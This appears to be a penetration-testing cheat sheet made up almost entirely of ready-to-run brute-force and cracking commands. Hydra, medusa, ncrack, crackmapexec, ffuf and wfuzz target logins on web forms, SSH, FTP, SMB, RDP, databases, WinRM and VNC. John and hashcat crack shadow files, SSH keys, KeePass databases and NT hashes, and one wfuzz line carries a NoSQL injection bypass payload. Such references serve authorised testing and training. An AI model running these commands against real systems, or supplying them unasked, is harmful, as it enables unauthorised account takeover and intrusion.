Skip to content

Bruteforce

Basic Auth

hydra

hydra -L user.txt -P pass.txt -s 80 -f $IP http-get / 
medusa
medusa -h $IP -U user.txt -P pass.txt -M  http -m DIR:/webdav/ -T 10

Form Auth

hydra

hydra $IP http-post-form "/login.php:username=^USER^&password=^PASS^:invalid" -l <USER> -P <PASS_FILE> -vV -f
ffuf
ffuf -w <PASS_FILE> -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/login.php -x http://127.0.0.1:8080 -fs 206
wfuzz
wfuzz -c -z file,<USER_NAMES_FILE> --sc 302 -d 'username=FUZZ&password[$ne]=NO_VALID_PASS&login=login' http://$URL

FTP

hydra

hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $IP ftp
hydra
hydra -L user.txt -P pass.txt ftp://$IP -I

SSH

hydra

hydra -l root -P pass.txt ssh://$IP -I -f
hydra -L user.txt -P pass.txt ssh://$IP -I -f
nmap
nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst \
      --script-args ssh-brute.timeout=4s <target>

SMB

crackmapexec

crackmapexec smb $IP -u user.txt -p pass.txt
hydra
hydra -L user.txt -P pass.txt $IP smb

RDP

ncrack

ncrack -vv --user <USER> -P <PASS_FILE> rdp://$IP
hydra
hydra -V -f -L <USER_LIST> -P <PASS_FILE> rdp://$IP
crowbar
crowbar -b rdp -s $IP -u <USER> -C <PASS_FILE> -n 1

mysql

medusa

medusa -h $IP -M mysql -u root -P /usr/share/wordlists/rockyou.txt -t 20 -f
hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt $IP mysql -t 20 -f

pssql

hydra

hydra -l postgres -P /usr/share/wordlists/rockyou.txt $IP postgres
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt <IP> postgres
medusa
medusa -h $IP -u postgres -P /usr/share/wordlists/rockyou.txt -M postgres
medusa -h <IP> -U /root/Desktop/user.txt -P /usr/share/wordlists/rockyou.txt -M postgres
ncrack
ncrack -v -U user.txt -P /usr/share/wordlists/rockyou.txt $IP:5432
patator
patator pgsql_login host=<IP> user=FILE0 0=user.txt password=FILE1 1=pass.txt
metasploit
use auxiliary/scanner/postgres/postgres_login
nmap
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 $IP

WinRm

crackmapexec - brute force

crackmapexec winrm $IP -d $domainName -u user.txt -p pass.txt
crackmapexec - check a pair of credentials
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
crackmapexec - check if the creds are valid to access winrm
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'

IRC

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=users.txt,passdb=/usr/share/wordlists/rockyou.txt  -p 6697 $IP

kdbx

keepass2john CEH.kdbx > ceh.hash
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
kpcli --kdb CEH.kdbx

VNC

hydra

hydra -s 5900 -P /usr/share/wordlists/rockyou.txt -t 4 -V -f vnc://$IP
ncrack
ncrack -P /usr/share/wordlists/rockyou.txt $IP:5900
medusa
medusa -h $IP -u gamma -P /usr/share/wordlists/rockyou.txt -M vnc

Unshadow

unshadow passwd shadow > passwd_shadow.txt
john
john passwd_shadow.txt
john passwd_shadow.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat
hashcat -m 1800 passwd_shadow.txt /usr/share/wordlists/rockyou.txt -O

Crack id_rsa

ssh2john id_rsa > id_rsa-hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa-hash

Crack nt hash

hashcat -m 1000 --force 26112010952d963c8dc4217daec986d9 /usr/share/wordlists/rockyou.txtx

phpmyadmin

hydra

export HYDRA_PROXY_HTTP=http://127.0.0.1:8080  

hydra -F -vV -l root -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1&token=a6afebdd3311fac747d68adb1a8bd7ca:denied"

medusa

medusa \
  -h $IP \
  -u root \
  -P /usr/share/wordlists/rockyou.txt \
  -M web-form \
  -m FORM:"phpmyadmin/index.php" \
  -m DENY-SIGNAL:"denied" \
  -m FORM-DATA:"post?pma_username=&pma_password=&server=1&&token=i=TQRF[zI*sEkNu@"

SquirrelMail 1.2.10

hydra

hydra -l <USER> -P <PASS_FILE> $IP http-post-form "/webmail/src/redirect.php:username=^USER^&password=^PASS^:F=incorrect" -V -F -u

Create password list

cewl -w pass.lst http://wordpress.hack -d 1
cat pass.lst | uniq | sort | tr '[:upper:]' '[:lower:]' > pass2.lst